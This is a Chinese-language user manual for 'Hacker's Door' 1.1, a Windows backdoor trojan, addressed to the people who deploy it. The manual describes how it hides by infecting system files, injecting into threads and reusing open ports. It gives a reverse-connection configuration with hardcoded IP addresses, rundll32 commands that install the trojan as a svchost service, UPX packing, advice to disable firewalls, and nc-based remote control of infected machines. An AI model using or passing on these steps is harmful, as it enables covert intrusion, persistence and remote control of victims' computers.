简介
黑客之门采用的目前一些先进的后门技术,它只有一个dll文件,通过感染系统文件启动自身,被
感染的系统文件大小和日期都不会改变;同时采用线程插入技术,本身没有进程;它本身不开端口,而是重
用系统进程开的任意一个端口,如80,135,139,445等,因此它的隐藏性是非常好的。
1.1版相对1.0版的改变:
1、全面改变客户端,使得它使用起来方便多了。
2、增加反向连接功能。
3、增加上线通知功能。
4、内部版增加了使用svchost.exe启动后门的方式。
一、使用环境
服务器端:Windows 2000及以上操作系统,服务器端默认文件名为hkdoordll.dll
客户端:Windows 2000及以上操作系统,客户端默认文件名为explore.exe。
二、使用步骤
1、运行客户端explore.exe文件,使用菜单“高级功能->生成服务器端”来生成服务器文件,
默认文件名为hkdoordll.dll。
如图:
2、使用菜单“设置->服务器端文件”来设置服务器文件的一些选项
如图:
弹出的设置窗口如下图:
其中的“连接密码”项的作用十分重要,下面用客户端对中木马机器的操作成功的前提是连接密码必须正确,
只有你改了密码,你种的木马才不会给别人利用!
“服务器端”就是你要配置的后门服务器端文件,你可以用'浏览'按钮来选择。
“反向连接URL”就是服务器端反向连接配置文件放的地方,服务器端要根据这个文件里的配置信息
来实现反向连接和上线通知功能,你必须把配置好的反向连接配置文件放在URL指定的地方。
下面是反向连接配置文件的内容及其说明:
##################################
#Global setting
ClientIp=10.144.81.253
InterVal=60
#Connect back setting
IsWantConnectBack=1
ConnectBackPort=110
#Notify setting
IsWantNotify=1
NotifyModth=1
NotifyPort=500
IcmpType=8
IcmpCode=0
#Connect back server
Server=202.117.92.3
Server=202.35.46.1
#################################
上面就是反向连接配置文件的内容,其中以'#'开头的行是注释行,'ClientIp'是客户端的ip地址,服务器
端根据这个地址就可以找到客户端了;'InterVal'是发上线通知报文的时间间隔,单位是秒;'IsWantConnectBack'
是表示是否需要反向连接,1表示需要,0表示不需要;'ConnectBackPort'是反向连接时客户端开的等待服
务器端连接的端口;'IsWantNotify'表示是否需要上线通知,1表示需要,0表示不需要;'NotifyModth'是
上线通知的方法,0表示用icmp报文,1表示用udp报文;'NotifyPort'是客户端开的等待上线通知报文的udp
端口,你可以用netstat -an命令来找客户端开的udp端口;'IcmpType'是icmp报文类型,'IcmpCode'是icmp
报文的子类型,IcmpType=8,IcmpCode=0就表示ping(icmp echo)报文,而IcmpType=0,IcmpCode=0就表示
ping 应答(icmp echo reply)报文;'Server'表示需要反向连接的服务器端ip地址,只有ip在这个列表中
的服务器端才会向客户端反向连接。
注意:
如果你的机器上装有防火墙,你必须关掉它或者修改它的规则,使得上线通知报文和
反向连接报文不会被防火墙挡住。
3、推荐使用upx等一些exe压缩软件都服务器端进行压缩
注意一定要选中“强制压缩”选项,否则有可能不能压缩。
如图:
4、在你要控制的机器上安装服务器端。
具体方法请参考1.0版使用说明及动画教程的安装部分,如下:
黑客之门1.0(hacker's door)使用说明
黑客之门1.0(hacker's door) 动画教程
下面说一下内部版加的安装方式:
在命令行下运行‘rundll32 hkdoordll,DllRegisterServer 服务名 2 0’就可以了,其中‘服务名’必须合法,
如运行‘rundll32 hkdoordll,DllRegisterServer Iprip 2 0’,就创建用svchost.exe来启动的Iprip服务来
启动黑客之门,如果你不知道合法的服务名,可以先随便给一个,然后到日志里去看合法的服务名列表。卸载用
‘rundll32 hkdoordll,DllUnRegisterServer 密码 服务名 2 0’,如rundll32 hkdoordll,DllUnRegisterServer yyt_hac
Iprip 2 0’,密码和服务名必须正确。
5、把那台机器添加到客户端的中木马的机器组中
为了对中木马的机器进行操作,你必须先把那台机器添加到客户端左边树型视图任意一个计算机组中,如下图:
6、设置客户端
6.1设置连接选项,选择菜单“设置->连接选项”,弹出对话框如下图:
6.1.1 在弹出窗口‘连接服务器端的方式’选项中,有六个选项:NC连接、命令行客户端、图形查看、图形控制、
文件传输和反向连接,本版本只支持NC连接和反向连接。
‘NC连接’就是用nc.exe这个工具来连接黑客之门服务器端,它包含正向连接和反向连接,正向
连接就是1.0版的连接方式,1.1版加了反向连接,它是指客户端用nc.exe开端口来等待服务器端的连接,这种连接
方式对于内网和动态ip的机器很有效,结合上线通知功能后效果更好。由于一般防火墙不会堵塞机器向外的连接请
求,这种方式的成功机会比较大,不过只有有外部ip的用户才可以使用这种方式。
注意:
1、用反向连接时,运行客户端机器的反向连接端口不能被占用,比如反向连接的端口,是80(这个端口是由反向连接
配置里的ConnectBackPort决定的),则web服务器一定要关掉,不然中木马的机器就会连到web服务器上而不是黑客之
门客户端!!!
2、用逆向连接连不上时,弹出的命令行端口不会自动关闭,请用Ctrl+C关闭窗口。
3、运行“连接到黑客之门”菜单项弹出命令行窗口后,输入‘NCLOGIN 连接密码’登录到目标机器。正向连接时
如果不能输入则换连接端口,反向连接要等一段时间才能输入。
6.1.2 建立文件传输连接的方式有两种,如下:
通过黑客之门服务器建立连接--这种方式用于安装了黑客之门的机器,通过那台机器上的黑客之门服务器端来建立连接。
通过指定用户名和密码建立连接--这种方式用于你知道有管理员权限的用户名和密码的机器。
本版本只支持‘通过指定用户名和密码建立连接’的方式。
6.1.3 其它设置中的“连接端口”是用来决定正向连接时客户端向服务器端连接的端口,要选一个服务器端的机器开的并且
允许连接的端口,否则连接不到黑客之门服务器端;“连接密码”一定要和刚才设置服务器文件时的连接密码一样,否则所
有对中木马机器的操作不会成功!
6.2 设置在线探测方式,选择菜单“设置->在线探测方式”,弹出对话框如下图:
第一种方式就是通过连接所选择计算机的tcp端口来判别机器是否在线着
第二种方式就是通过连接黑暗天使服务器端来判别机器是否在线
注意:用第一种方式探测到机器在线只能说明那台机器连在网上,而用第二种方式探测到机器在线,就是说明
那台机器安装了黑客之门服务器端,并且能连上,因此用这种方式时连接选项中的连接端口和连接密码必须设置好。
6.3 设置反向连接和上线通知功能,选择菜单“设置->反向连接选项”,弹出对话框如下图:
‘网络监听ip’就是接收上线通知报文的ip,一般要设置为外网的ip,需要管理员权限,这个ip一定要设置正确
否则上线通知功能 不能使用。
‘反向连接URL’就是放反向连接配置文件的URL,也要和配置服务器端时的反向连接URL一致。
设置成功后,如果上线的计算机没有添加到‘远程计算机’组中,则会自动加入,否则机器的图标会变亮,同时
将鼠标放到那台机器上时会出现服务器端的基本信息,如下图:
7、使用客户端对那台机器进行各种操作
选中那台机器,按右键弹出菜单,如下图:
下面说明弹出菜单各项的作用
7.1 连接到黑客之门--该项的作用就是根据连接选项中的“连接服务器端的方式”来和所选择的机器建立连接,
目前只支持用nc连接的方式,它会弹出一个命令行端口让你输入‘NCLOGIN 连接密码’登录到黑客之门服务器端。
如下图:
7.2 连接到telnet服务器--该项的作用就是在中木马的机器上打开telnet服务,但不添加用户名和密码,你必要
用建立连接时的用户名和密码登录,下图为单击该菜单项弹出的登录,使用这个功能的前提是你必须用用户名和密码
和目标机器建立了文件传输连接。
窗口:
由于这种连接方式比较容易被发现,建议只在升级黑客之门或不能连接到黑客之门服务器端时使用。
7.3 停止telnet服务器--该项的作用是停止目标机器上的telnet服务。前提和上一个功能一样。
7.4 在线探测--该项作用就是根据所设的在线探测方式来探测机器是否在线
7.5 建立文件传输连接--该项的作用就是和远程的机器建立文件传输连接,使你能够象本地机器一样浏览
、操作远程机器的文件。如下图:
7.6 断开文件传输连接--该项的作用就是断开上一项建立的文件传输连接。
7.7 高级菜单中在线探测全部就是探测所有的机器是否在线
与我联系
个人主页:http://http://www.yythac.com
Email:yyt_hac@163.com
Email:webmaster@yythac.com
QQ:47090005
如果有什么好的建议可以来信告诉我。
发布日期:2004.10.28